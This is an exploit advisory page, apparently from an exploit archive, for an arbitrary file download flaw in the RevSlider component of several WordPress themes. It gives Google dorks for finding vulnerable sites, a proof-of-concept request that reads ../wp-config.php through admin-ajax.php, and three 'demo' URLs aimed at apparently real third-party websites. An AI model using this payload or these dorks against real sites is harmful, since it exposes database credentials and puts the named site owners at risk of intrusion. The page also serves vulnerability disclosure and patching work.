Wordpress Theme Arbitrary File Download Vulnerability

2015.03.25
Credit: Iran Cyber Security Group
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A
Dork: inurl:wp-content/themes/bretheon/ OR inurl:\"wp-content/themes/u-design/

############################################################# # Wordpress Theme Arbitrary File Download Vulnerability # # # # # Exploit Author: Iran Cyber Security Group # # ############################################################# # # # Exploit Title: Wordpress Theme Arbitrary File Download Vulnerability # # Date: 25/03/2015 # # Exploit Author: Iran Cyber Security Group # # Contact : Iran-Cyber.Org - icg_Sec@yahoo.com| # # Tested on: Linux / Window # # # Google Dork: # # inurl:wp-content/themes/bretheon/ # inurl:"wp-content/themes/u-design/ # inurl:"wp-content/themes/terra/ # inurl:"wp-content/themes/pindol/ # ########################################### # # # PoC # # http://target/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php # # # # # Demo : # # http://www.rentaltableXts.co.uk/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php # http://www.spi-enginXeering.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php # http://www.vidyasaXgar.com/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php # # # #############################################################


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top